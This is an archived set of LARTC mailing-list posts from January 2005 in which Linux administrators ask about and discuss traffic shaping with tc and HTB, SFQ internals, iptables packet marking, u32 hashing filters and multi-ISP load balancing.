> what is the best method to use to shape the traffic on my linux gateway ?
I know that there is several possibilities, like wondershaper script , htb.init script and even l7-filter but I still confused about the right procedure that I have to use.
> most probably, I have to customize my script so it can reflect what I want, I know also that I have to learn pretty much on those different shaping methods, but is there some good books/ internet site where I can find some useful information about that ? I also looking for some guides that could help me to begin the project.
> also, is there a way to make the shaping different for particular ips or protocols ? I know that I can mark some packets but still confused how to make all the stuff work.
The linux world is so huge that I am pretty lost ... so different method, so many considerations, patches to apply, stuff like that. I want to learn and master my network, and working hard is not a problem. The problem is maybe when a newby starts to enter the linux world, it is quite confusing ... Anyway, I am ready to work hard on this project and I hope I can count on the linux community to give me a little help.
I know that those questions are maybe already been asked by other people in the same situation. So I will try to create a guide as the project will evolve and make it available on the net for everybody.
I really need some advices here because I know that it is possible.
Any help will be appreciated.
Sorry for my english ...

Romain Pelissier
9900 Cavendish Blvd., suite 200
St-Laurent, QC H4M 2V2
T 514.333.6600 /126
F 514.333.1080
Romain.Pelissier@sqliaison.com
www.sqliaison.com

From nug@sch.bme.hu Wed Jan 12 14:06:11 2005
From: nug@sch.bme.hu (Tóth Nándor)
Date: Wed, 12 Jan 2005 15:06:11 +0100
Subject: [LARTC] Good pratice with a Linux Gateway / Traffic Shapping
In-Reply-To:
References:
Message-ID: <41E52ED3.4010209@sch.bme.hu>

Hi!
I am not very experienced, but maybe i can help you.

TechSupport wrote:
> Hi,
> I am the network administrator of my company, I know quite well Windows networking and a few about Linux and its amazing routing and QOS capabilities.
> Right now, we have a burstable T1, which means that the bill increases with our T1 use.
> I have decided to find a way to shape the traffic so I can stay at a reasonable speed of 256 kb/s (Up/down) on my T1.
> I have linux gateway with 2 nics behind a PIX firewall.
> Right now, the gateway and the pix are configured in a way so I can have a network segment inside my internal network.
> The Linux version is suse PRO 9.2
> My questions are (yes, they are several questions)
>
>>what is the best method to use to shape the traffic on my linux gateway ?

I think you should use HTB method.
http://luxik.cdi.cz/~devik/qos/htb/
Limit the incoming and/or outgoing bandwidth, maybe make some subclasses to have guaranteed bandwidth for web, mail, etc. You should attach an SFQ qdisc to the most popular classes.

> I know that there is several possibilities, like wondershaper script , htb.init script and even l7-filter but I still confused about the right procedure that I have to use.
>
>>most probably, I have to customize my script so it can reflect what I want, I know also that I have to learn pretty much on those different shaping methods, but is there some good books/ internet site where I can find some useful information about that ? I also looking for some guides that could help me to begin the project.
>>also, is there a way to make the shaping different for particular ips or protocols ? I know that I can mark some packets but still confused how to make all the stuff work.
>
> The linux world is so huge that I am pretty lost ... so different method, so many considerations, patches to apply, stuff like that. I want to learn and master my network, and working hard is not a problem. The problem is maybe when a newby starts to enter the linux world, it is quite confusing ...
> Anyway, I am ready to work hard on this project and I hope I can count on the linux community to give me a little help.
> I know that those questions are maybe already been asked by other people in the same situation. So I will try to create a guide as the project will evolve and make it available on the net for everybody.
> I really need some advices here because I know that it is possible.
> Any help will be appreciated.

This site helped me a lot, to understand:
http://www.knowplace.org/shaper/

I didn't use any prepared scripts but write my own using iptables and tc basic commands. If you are a network administrator i recommend this to you too, because this is the way to really understand what you do.

--
Udv,
Nandor

Ps. Welcome to the linux community!

From db@wless.gr Wed Jan 12 16:07:12 2005
From: db@wless.gr (Mpourtounis Dimitris)
Date: Wed, 12 Jan 2005 18:07:12 +0200
Subject: [LARTC] Connection tracking flush
Message-ID: <1105546032.5000.3.camel@WLESS>

Hi all,

Is there a way i can flush the connection tracking on my box (after a restart in iptables)? If the connection tracking module is unloaded and reloaded, my job will be accomplished i think. The bad thing is i want this tracking module to exist in kernel code and not loaded as a module.

Regards,
DB

From brooke@dizzyg.net Wed Jan 12 17:21:00 2005
From: brooke@dizzyg.net (brooke)
Date: Wed, 12 Jan 2005 11:21:00 -0600
Subject: [LARTC] 2 internet connections for 2 different purposes
In-Reply-To: <000b01c4ee11$9ba62c30$200fa8c0@DELTA>
References: <41D33636.20503@dizzyg.net> <000b01c4ee11$9ba62c30$200fa8c0@DELTA>
Message-ID: <41E55C7C.9050707@dizzyg.net>

Well, I found a FAQ on the site of shorewall.net site, the config files for the iptables setup I'm using.
http://shorewall.net/FAQ.htm#faq32
but it's not what I want to do.

So for now I've got the incoming NAT working for the dmz network, if you come in eth4 on a proper address I route you to eth3 the dmz network and translate it to a 10.2 address.

My problem seems to be the outgoing. I don't understand how I tell all machines who are on the 10.1.x.x network connected via eth0 to go out of the ISP connected via eth2. Also, I don't understand how I make machines on the 10.2.1.x network on eth3 to use the internet connection via eth4.

anyone care to get me going in the right direction?

Thanks in advance
Brooke

Chris Bennett wrote:
> When you say you are so close but can't get your head around the final
> part... what do you mean? Exactly what is working and what is not?
> How far have you gotten?
>
> ----- Original Message ----- From: "brooke"
> To:
> Sent: Wednesday, December 29, 2004 4:56 PM
> Subject: [LARTC] 2 internet connections for 2 different purposes
>
>
>> I've got a linux machine (fedora core 3) with 4 network cards.
>>
>> I looked at the howto and the only example that is close to what I
>> need to do is section 4.2 on multiple uplink providers. I feel like
>> I'm so close but just can't get my head around the final part.
>>
>> Here is what I have
>>
>> eth2 and eth4 connect to 2 different isps.
>> I want all connections the come from my dmz on eth3 to go out of my
>> connection on eth4
>> I want all connections from my local network on eth0 to go out of my
>> connection on eth2
>>
>> can anyone help me out with this?
>> thanks in advance
>> Brooke
>>
>> _______________________________________________
>> LARTC mailing list / LARTC@mailman.ds9a.nl
>> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>>

From stef.coene@docum.org Wed Jan 12 17:44:46 2005
From: stef.coene@docum.org (Stef Coene)
Date: Wed, 12 Jan 2005 18:44:46 +0100
Subject: [LARTC] Need help regarding TBF Token rate setting
In-Reply-To: <20050111112116.0AB253982EF@ws5-1.us4.outblaze.com>
References: <20050111112116.0AB253982EF@ws5-1.us4.outblaze.com>
Message-ID: <200501121844.46855.stef.coene@docum.org>

On Tuesday 11 January 2005 12:21, sanjeev ravindran wrote:
> Hi,
>
> I would like to know how to specify the token rate when a tbf qdisc is
> created using tc tool.. Will it be a default value when tbf qdisc is
> created?

http://lartc.org/manpages/tc-tbf.html
The token fill rate is rate / timer (Hz)

Stef

From Aaron Wolfe Wed Jan 12 17:59:07 2005
From: Aaron Wolfe (Aaron Wolfe)
Date: Wed, 12 Jan 2005 12:59:07 -0500
Subject: [LARTC] Load balancing / Traffic shaping project looking for help
Message-ID:

Hi,

I've managed to create a web based interface to some of the advanced routing capabilities in Linux. Currently it is functional (and pretty, i think :) although far from perfect. I'm looking for people with better programming skills and/or understandings of advanced routing concepts in Linux than I have who'd like to help out with the project.

The overall goals are:
#1 to make advanced routing and traffic shaping very easy for those just getting started
#2 allow admins to easily backup or restore multiple versions of an entire linux router's configuration (fw, routing, traffic shaping, interface settings etc) via a single text file, much like a cisco router
#3 make it all pretty enough that the nontechnical CIO types say "wow" and let us use linux routers in production more often.

The current system is a collection of perl CGI scripts and a background process that keeps an eye on things. It supports high availability via the heartbeat project and uses Julian Anastasov's kernel patches to support load balanced routing with dead gateway detection. The background process can start a dialup connection if all other connections have failed.
rrdtool is used to generate lots of pretty graphs locally, and the system supports snmp and zabbix remote monitoring.

If you're interested (and especially if you'd like to help!) please check out the project page:

http://sourceforge.net/projects/kdtrg/

thanks
-Aaron

From valton@ipko.net Wed Jan 12 18:08:03 2005
From: valton@ipko.net (Valton Hashani)
Date: Wed, 12 Jan 2005 19:08:03 +0100
Subject: [LARTC] hashing filters
References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> <20050112131121.GA5641@krezus.e-wro.net>
Message-ID: <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z>

Hi,
with a Tomasz suggestions I tried with the setup below but it appears at the same place, the same error.

RTNETLINK answers: File exists
We have an error talking to the kernel

Is there any other way?

Regards,
Valton

-------------------------
tc qdisc del dev eth0 root
tc qdisc add dev eth0 root handle 1: htb
tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil 100MBit
tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256
#tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2:
tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/24 hashkey mask 0x000000ff at 16 link 2:
tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil 128Kbit

j=0;
while [ $j -le 254 ]
do
i=0;
while [ $i -le 254 ]
do
hexi=`echo "obase=16; $i" | bc`
echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
i=$((i+1))
done
j=$((j+1))
done

----- Original Message -----
From: "Tomasz Paszkowski"
To: "Valton Hashani"
Cc:
Sent: Wednesday, January 12, 2005 2:11 PM
Subject: Re: [LARTC] hashing filters

On Wed, Jan 12, 2005 at 01:27:18PM +0100, Valton Hashani wrote:
> Hi all,
> I am a newbie and I have not played a lot with tc utility. I have read maybe everything that has to do with massive filtering (maybe not everything). If you can help me on this I would appreciate that very much. I use tc utility with iproute2-ss040831.
> I want to limit bandwidth for the 192.168.0.0/16 subnet using this script.
>
>
> tc qdisc del dev eth0 root
> tc qdisc add dev eth0 root handle 1: htb
> tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil 100MBit
> tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256
> tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2:

change to:
tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/24 hashkey mask 0x000000ff at 16 link 2:

> tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil 128Kbit
>
> j=0;
>
> while [ $j -le 254 ]
>
> do
> i=0;
>
> while [ $i -le 254 ]
> do
> hexi=`echo "obase=16; $i" | bc`

add here:
echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3

and show us results.

> tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
> i=$((i+1))
> done
>
> j=$((j+1))
> done
>
> somewhere at 192.168.8.7/32 it appears on the screen this message
>
> RTNETLINK answers: File exists
> We have an error talking to the kernel
>
> Can you tell me please what am I doing wrong.

--
Tomasz Paszkowski

From shemminger@osdl.org Wed Jan 12 20:30:39 2005
From: shemminger@osdl.org (Stephen Hemminger)
Date: Wed, 12 Jan 2005 12:30:39 -0800
Subject: [LARTC] Test version of iproute2
Message-ID: <20050112123039.7b02f2f6@dxpl.pdx.osdl.net>

There is a new version of iproute2 for testing.
http://developer.osdl.org/dev/iproute2/download/iproute2-2.6.10-ss050112.tar.gz

Mostly simple merges, but could have some issues. Jamal did I get everything you sent?

[Masahide Nakamura] ipmonitor shows IPv6 prefix list notification update to iproute2 xfrm for ipv6
[Stephen Hemminger] fix compile warnings when building 64bit system don't include warning about "ip route nat" no longer supported
[Catalin(ux aka Dino) BOIE] fwmark in u32 filters
[Andi Kleen] netlink manual page
[Thomas Graf] tc testsuite
[Jamal Hadi Salim] iptables tc support mirror and redirect actions

--
Stephen Hemminger

From aperlu@telefonica.net Wed Jan 12 21:15:00 2005
From: aperlu@telefonica.net (Antonio Pérez)
Date: Wed, 12 Jan 2005 22:15:00 +0100
Subject: [LARTC] load balancing
Message-ID: <41E59354.5060908@telefonica.net>

Hi everyone.

I have two ADSL connection with the same ISP,

ppp0 => 83.32.32.36 <=> 192.168.153.1
ppp1 => 83.32.45.33 <=> 192.168.153.1

and I want to do load balancing with the two connections, so I do:

#ip route add default scope global nexthop via 192.153..1.1 dev 83.32.32.36 weight 1 nexthop via 192.168.153.1 dev 83.32.45.33 weight 1

#ip route show
192.153.1.1 dev ppp0 proto kernel scope link src 83.32.32.36
192.153.1.1 dev ppp1 proto kernel scope link src 83.32.45.33
default
	nexthop via 192.168.153.1 dev ppp0 weight 1
	nexthop via 192.168.153.1 dev ppp1 weight 1

But this do not work, when I try do ping www.google.es this do not work and I get the message "MASQUERADE: Route sent us somewhere else"

I am using the 2.6.8 kernel.

Anybody can help me? please.

Thanks you.

From micah milano Thu Jan 13 00:41:41 2005
From: micah milano (micah milano)
Date: Wed, 12 Jan 2005 18:41:41 -0600
Subject: [LARTC] Load balancing / Traffic shaping project looking for help
In-Reply-To:
References:
Message-ID: <70fda320501121641542cd8a9@mail.gmail.com>

This looks really nice! I really would like to try it out, but there is no code on the sourceforge site released yet.

Unfortunately I am not the person you are looking for as my understanding of the advanced routing concepts is not that good yet, that's why I am interested in your tool :)

How much of this actually works?

micah

On Wed, 12 Jan 2005 12:59:07 -0500, Aaron Wolfe wrote:
> Hi,
>
> I've managed to create a web based interface to some of the advanced
> routing capabilities in Linux. Currently it is functional (and
> pretty, i think :) although far from perfect. I'm looking for people
> with better programming skills and/or understandings of advanced
> routing concepts in Linux than I have who'd like to help out with the
> project.
>
> The overall goals are:
> #1 to make advanced routing and traffic shaping very easy for those
> just getting started
> #2 allow admins to easily backup or restore multiple versions of an
> entire linux router's configuration (fw, routing, traffic shaping,
> interface settings etc) via a single text file, much like a cisco
> router
> #3 make it all pretty enough that the nontechnical CIO types say "wow"
> and let us use linux routers in production more often.
>
> The current system is a collection of perl CGI scripts and a
> background process that keeps an eye on things. It supports high
> availability via the heartbeat project and uses Julian Anastasov's
> kernel patches to support load balanced routing with dead gateway
> detection. The background process can start a dialup connection if
> all other connections have failed.
> rrdtool is used to generate lots of pretty graphs locally, and the
> system supports snmp and zabbix remote monitoring.
>
> If you're interested (and especially if you'd like to help!)
> please check out the project page:
>
> http://sourceforge.net/projects/kdtrg/
>
> thanks
> -Aaron

From andy.furniss@dsl.pipex.com Thu Jan 13 03:21:00 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 13 Jan 2005 03:21:00 +0000
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
In-Reply-To: <1483.192.168.1.2.1105403313@maild.mine.nu>
References: <1483.192.168.1.2.1105403313@maild.mine.nu>
Message-ID: <41E5E91C.6050606@dsl.pipex.com>

junk@maild.mine.nu wrote:
> I am still looking for a solution to this problem.......
>
>>junk@maild.mine.nu wrote:
>>
>>>Hi,
>>>Yes i did give this a try a couple of times before with no success
>>>
>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK
>>>--set-mark 0x2
>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK
>>>--set-mark 0x1

Had a go at this on 2.6.9 / iptables 1.2.11 and it seems nth is broken.

I'll try again tomorrow.

Andy.

From sanjeev_ravindran@linuxmail.org Thu Jan 13 05:37:22 2005
From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran)
Date: Thu, 13 Jan 2005 13:37:22 +0800
Subject: [LARTC] Need help regarding TBF Token rate setting
Message-ID: <20050113053722.8D7F92B2B86@ws5-7.us4.outblaze.com>

Thank you so much for ur response Stef,

I have one more doubt that I would like to clear... If I set the rate in kbps at which i want my data to flow, the token rate will be automatically taken and i dont have to set it, right?

Thank you for ur time...

regards
sanjeev

----- Original Message -----
From: "Stef Coene"
To: lartc@mailman.ds9a.nl
Subject: Re: [LARTC] Need help regarding TBF Token rate setting
Date: Wed, 12 Jan 2005 18:44:46 +0100

>
> On Tuesday 11 January 2005 12:21, sanjeev ravindran wrote:
> > Hi,
> >
> > I would like to know how to specify the token rate when a tbf qdisc is
> > created using tc tool.. Will it be a default value when tbf qdisc is
> > created?
> http://lartc.org/manpages/tc-tbf.html
> The token fill rate is rate / timer (Hz)
>
> Stef

From prarams@yahoo.co.in Thu Jan 13 08:13:18 2005
From: prarams@yahoo.co.in (raamaraju birudaraju)
Date: Thu, 13 Jan 2005 08:13:18 +0000 (GMT)
Subject: [LARTC] traffic routing
Message-ID: <20050113081318.46688.qmail@web8509.mail.in.yahoo.com>

Hi to all

I have a linux box installed redhat enterprise linux es 3 with 2 NIC's and i have configured squid web proxy for my lan network.what i want is

1. all my lan customers should use proxy
2.all my lan customers should be able to use yahoo messenger,msn messenger and they should be able to use yahoo voice chat and web cam features when they use through proxy.
3.i want to block p2p softwares from my lan customers as they are eating bandwidth a lot.

please do help me how to do this using squid and iptables to allow only few ports for yahoo messenger and block remaining ports

thanks in advance

ramu.

From tomasz.paszkowski@e-wro.pl Thu Jan 13 09:06:29 2005
From: tomasz.paszkowski@e-wro.pl (Tomasz Paszkowski)
Date: Thu, 13 Jan 2005 10:06:29 +0100
Subject: [LARTC] hashing filters
In-Reply-To: <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z>
References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> <20050112131121.GA5641@krezus.e-wro.net> <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z>
Message-ID: <20050113090629.GB29469@krezus.e-wro.net>

On Wed, Jan 12, 2005 at 07:08:03PM +0100, Valton Hashani wrote:

change the script to:

i=0;
while [ $i -le 254 ]
do
hexi=`echo "obase=16; $i" | bc`
tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
i=$((i+1))
done

connected with modifications from previous mail it should work.

--
Tomasz Paszkowski
Administrator
Miejskie Sieci Informatyczne
e-wro
http://www.e-wro.pl

From andy.furniss@dsl.pipex.com Thu Jan 13 10:09:16 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 13 Jan 2005 10:09:16 +0000
Subject: [LARTC] Could anyone explain the slot and bucket concept in SFQ to me?
In-Reply-To: <200501101527.j0AFRG77008922@mx4.ust.hk>
References: <200501101527.j0AFRG77008922@mx4.ust.hk>
Message-ID: <41E648CC.8020107@dsl.pipex.com>

Wang Feng wrote:
> Dear all,
>
> I'm reading codes in sch_sqf.c in kernel 2.4 of Linux.
> I find I messed up with the concept of slot, bucket and hash tables.

I get messed up too when I read it.
You can play with the values if you use ESFQ.

I can't explain in detail but at high level -

Slot is linked list of packets whose IPs + src port (if TCP/UDP) hash into same hash bin/bucket. Slots get dequeued in turn using DRR.

Hash buckets/bins (1024 of by default) is the what hash function maps to, to try and separate flows. You can make it bigger with esfq so hopefully get less chance of different flows mapping to same bin and so their packets ending up being queued in same slot.

> Could anyone explain the data structure of the hash tables a little to me.
>
> Thanks very much.
>
> Best,
> Franklin
>
> BTW: I can not understand why the number of entries of dep[SFQ_DEPTH*]
> should be twice:(

Don't know but esfq defines pointer rather than array here.

Andy.

From karyon@ukr.net Thu Jan 13 10:10:21 2005
From: karyon@ukr.net (karyon@ukr.net)
Date: Thu, 13 Jan 2005 12:10:21 +0200
Subject: [LARTC] IpRoute + NAT problem
Message-ID: <6787949514.20050113121021@ukr.net>

From andy.furniss@dsl.pipex.com Thu Jan 13 12:27:54 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 13 Jan 2005 12:27:54 +0000
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
In-Reply-To: <41E5E91C.6050606@dsl.pipex.com>
References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E5E91C.6050606@dsl.pipex.com>
Message-ID: <41E6694A.2020203@dsl.pipex.com>

Andy Furniss wrote:
> junk@maild.mine.nu wrote:
>
>> I am still looking for a solution to this problem.......
>>
>>> junk@maild.mine.nu wrote:
>>>
>>>> Hi,
>>>> Yes i did give this a try a couple of times before with no success
>>>>
>>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK
>>>> --set-mark 0x2
>>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK
>>>> --set-mark 0x1
>
>
> Had a go at this on 2.6.9 / iptables 1.2.11 and it seems nth is broken.
>
> I'll try again tomorrow.

Seems still broken.

I built vanilla(apart from nth) 2.6.10, new iptables 1.2.11 +
pom-200400621 with runme extra only said y to nth.

I see -

Chain OUTPUT (policy ACCEPT 817 packets, 103K bytes)
 pkts bytes target     prot opt in     out     source               destination
   15  1260 MARK       all  --  *      eth0    0.0.0.0/0            0.0.0.0/0           every 2th packet #0 MARK set 0x1
   15  1260 MARK       all  --  *      eth0    0.0.0.0/0            0.0.0.0/0           every 2th packet #1 MARK set 0x2

Chain POSTROUTING (policy ACCEPT 817 packets, 103K bytes)
 pkts bytes target     prot opt in     out     source               destination
    0     0            all  --  *      eth0    0.0.0.0/0            0.0.0.0/0           MARK match 0x1
   15  1260            all  --  *      eth0    0.0.0.0/0            0.0.0.0/0           MARK match 0x2

[root@amd /home/andy]# cat ./nth-test
iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 0 -j MARK --set-mark 1
iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 1 -j MARK --set-mark 2
iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 1
iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 2

Any Ideas anyone?

TIA

Andy.

From Johan Jordaan Thu Jan 13 13:02:46 2005
From: Johan Jordaan (Johan Jordaan)
Date: Thu, 13 Jan 2005 13:02:46 +0000
Subject: [LARTC] Bandwidth management under linux
Message-ID: <8105747b0501130502342acdca@mail.gmail.com>

In my search to control bandwidth on my network I found 2 projects..

1. TC
2. BWM Tools - http://freshmeat.net/projects/bwmtools/

This brings me to 2 questions...

Firstly, can TC control bandwidth in both directions? I read that it
can only do 1 direction, which one I cant remember. Can you monitor
the load on the queues you define?
Does TC support IPv6?

Secondly, BWM Tools seems to queue traffic to userspace and use some
kind of kernel module to allow it through or not. How efficient is
bandwidth control using ip queueing to userspace? BWM Tools doesn't seem
to support IPv6 :(

If anyone else knows of a way I can shape traffic, please let me know.

Regards
Johan

From andy.furniss@dsl.pipex.com Thu Jan 13 13:05:24 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 13 Jan 2005 13:05:24 +0000
Subject: [LARTC] Slow large pings
In-Reply-To: <729574587.20050109133610@inbox.lv>
References: <729574587.20050109133610@inbox.lv>
Message-ID: <41E67214.2070808@dsl.pipex.com>

kasp wrote:
> Hello lartc,
>
> Testing some rules I found out that any rules are slowing down large pings!

I can't reproduce this.

> For example:
>
> tc qdisc add dev eth0 root handle 1: htb
> tc class add dev eth0 parent 1: classid 1:1 htb rate 100Mbit prio 1 ceil 100Mbit
> tc class add dev eth0 parent 1:1 classid 1:2 htb rate 100Mbit prio 2 ceil 100Mbit
> tc filter add dev eth0 parent 1:0 prio 5 u32 \

Error for me unless I add protocol ip

> match ip src 10.10.10.1 \
> match ip dst 10.10.10.10 \
> flowid 1:2
> tc qdisc add dev eth0 parent 1:2 handle 2: sfq perturb 10
>
> Small pings are ok - <10ms, here is output for 65500 byte pings:

10ms is high I get 0.3 with p200mmx +rtl8139 + cheapest switch I could
find + cables made without crimping tool.
>
> Pinging test [10.10.10.1] with 65500 bytes of data:
>
> Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64
> Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64
> Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64
> Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64
>

I see 14ms

> Ping statistics for 10.10.10.1:
> Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
> Approximate round trip times in milli-seconds:
> Minimum = 120ms, Maximum = 120ms, Average = 120ms
>
> If I don't use any rules, 65500 byte pings are about ~10ms
> Any filters are slowing large pings for 10 times!!!
> What can I do to tune it up?
>

What kernel and hardware are you using?

Andy.

From stef.coene@docum.org Thu Jan 13 14:07:41 2005
From: stef.coene@docum.org (Stef Coene)
Date: Thu, 13 Jan 2005 15:07:41 +0100
Subject: [LARTC] Bandwidth management under linux
In-Reply-To: <8105747b0501130502342acdca@mail.gmail.com>
References: <8105747b0501130502342acdca@mail.gmail.com>
Message-ID: <200501131507.41996.stef.coene@docum.org>

On Thursday 13 January 2005 14:02, Johan Jordaan wrote:
> In my search to control bandwidth on my network I found 2 projects..
>
> 1. TC
> 2. BWM Tools - http://freshmeat.net/projects/bwmtools/
>
> This brings me to 2 questions...
>
> Firstly, can TC control bandwidth in both directions?

It can shape outgoing traffic. If you have 2 network cards, you can shape in
both directions. But it can also throttle incoming traffic if you want (this
is not so powerful as shaping outgoing traffic).

> I read that it
> can only do 1 direction, which one I cant remember.

Outgoing.

> Can you monitor
> the load on the queues you define?

Yes, with external scripting.

> Does TC support IPv6?

Yes (I think)

> Secondly, BWM Tools seems to queue traffic to userspace and use some
> kind of kernel module to allow it through or not. How efficient is
> bandwidth control using ip queueing to userspace? BWM Tools doesn't seem
> to support IPv6 :(

I don't know how BWM works.

Stef

From stef.coene@docum.org Thu Jan 13 14:09:16 2005
From: stef.coene@docum.org (Stef Coene)
Date: Thu, 13 Jan 2005 15:09:16 +0100
Subject: [LARTC] Need help regarding TBF Token rate setting
In-Reply-To: <20050113053722.8D7F92B2B86@ws5-7.us4.outblaze.com>
References: <20050113053722.8D7F92B2B86@ws5-7.us4.outblaze.com>
Message-ID: <200501131509.16731.stef.coene@docum.org>

On Thursday 13 January 2005 06:37, sanjeev ravindran wrote:
> Thank you so much for ur response Stef,
>
> I have one more doubt that I would like to clear... If I set the rate in
> kbps at which i want my data to flow, the token rate will be automatically
> taken and i dont have to set it, right?

Indeed. Just set the desired rate.

Stef

From netf@death.pl Thu Jan 13 15:17:21 2005
From: netf@death.pl (netf@death.pl)
Date: Thu, 13 Jan 2005 16:17:21 +0100 (CET)
Subject: [LARTC] tc class ls dev (device) ... segfault.
Message-ID: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20>

Hello.
I have got strange problem with tc utility (iproute2-ss001007) on linux
2.4.18.
No matter what rules i am going to test, the result of 'tc class ls/show'
is always the same :

ATSLite ()# tc -s class ls dev eth1
do_page_fault() #2: sending SIGSEGV to tc for illegal read access from
00000000 (epc == 00000000, ra == 00408750)
Segmentation fault

tc -s qdisc ls , tc -s filter ls ... works well.
shaping, qos works well too.

Does anybody can help me with solving this problem?
Thx in advance.

ps.
I can't change kernel etc .. coz it's the only one kernel i can run on AP
based on rtl8181 - planet wap-1963a

From bigworld@ua.fm Fri Jan 14 05:02:12 2005
From: bigworld@ua.fm (Big World)
Date: Fri, 14 Jan 2005 00:02:12 -0500
Subject: [LARTC] problem with mark, need help
Message-ID:

Hello.
I have eth1 for WAN(0.0.0.0) and eth0 for LAN (192.168.10.0/24), need to
setup that local user get access to $LOCAL_IP network and ip 192.168.10.2,
192.168.10.3 (will be more in future) to internet, but bandwidth to
$LOCAL_IP is 128kbps and for internet is 8kbps.

i wrote rc.firewall

#!/bin/bash
#env
IPTABLES="/usr/sbin/iptables"
LOCAL_IP="62.64.80.0/21 62.221.38.0/24 ........................" # LOCAL_IP network

$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT DROP
$IPTABLES -P FORWARD DROP

......... # not important rule
........

#for local_network
$IPTABLES -N local_ip
for net_address in $LOCAL_IP; do
    $IPTABLES -A local_ip -p all -d $net_address -j ACCEPT
done
$IPTABLES -A local_ip -p all -j REJECT

# Forward rules for all
$IPTABLES -A FORWARD -m state --state ESTABLISHED,RELATED -i eth1 -j ACCEPT
$IPTABLES -A FORWARD -s 192.168.10.2 -m mac --mac-source 00:11:2F:92:D1:5E -j ACCEPT
$IPTABLES -A FORWARD -s 192.168.10.3 -m mac --mac-source 00:11:11:1D:D6:37 -j ACCEPT
$IPTABLES -A FORWARD -s 192.168.10.5 -m mac --mac-source 00:11:2F:4A:88:47 -j local_ip
$IPTABLES -A FORWARD -s 192.168.10.6 -m mac --mac-source 00:0E:A6:52:76:DD -j local_ip
..............

# IF file isn't from $LOCAL_IP
for net_address in $LOCAL_IP; do
    $IPTABLES -t mangle -A FORWARD -s ! $net_address -d 192.168.10.2 -j MARK --set-mark 3
    $IPTABLES -t mangle -A FORWARD -s ! $net_address -d 192.168.10.3 -j MARK --set-mark 4
done

# If ip address is from the $LOCAL_IP
for net_address in $LOCAL_IP; do
    $IPTABLES -t mangle -A FORWARD -s $net_address -d 192.168.10.2 -j MARK --set-mark 1
    $IPTABLES -t mangle -A FORWARD -s $net_address -d 192.168.10.3 -j MARK --set-mark 2
done

# Enable simple IP Forwarding and Network Address Translation
$IPTABLES -t nat -A POSTROUTING -o eth1 -j SNAT --to-source 195.24.150.150

I marked package that could use it for control bandwidth, but if package
from $LOCAL_IP to 192.168.10.2 it will be marked two time (mark 3 then
mark 1). Why iptables doing it?

# config bandwidth
#!/bin/bash
TC=/sbin/tc

$TC qdisc add dev eth0 root handle 1:0 htb default 4

# sub class of root
$TC class add dev eth0 parent 1:0 classid 1:1 htb rate 136kbps ceil 136kbps
$TC class add dev eth0 parent 1:1 classid 1:2 htb rate 128kbps ceil 128kbps
$TC class add dev eth0 parent 1:1 classid 1:3 htb rate 8kbps ceil 8kbps

# Classes for local users
$TC class add dev eth0 parent 1:2 classid 1:20 htb rate 16kbps ceil 128kbps
$TC class add dev eth0 parent 1:2 classid 1:21 htb rate 16kbps ceil 128kbps
$TC class add dev eth0 parent 1:2 classid 1:22 htb rate 16kbps ceil 128kbps
$TC class add dev eth0 parent 1:2 classid 1:23 htb rate 16kbps ceil 128kbps

$TC filter add dev eth0 protocol ip parent 1:0 handle 1 fw flowid 1:20
$TC filter add dev eth0 protocol ip parent 1:0 handle 2 fw flowid 1:21
$TC filter add dev eth0 protocol ip parent 1:0 u32 match ip dst 192.168.10.5 flowid 1:22
$TC filter add dev eth0 protocol ip parent 1:0 u32 match ip dst 192.168.10.6 flowid 1:23

# Classes for inet users
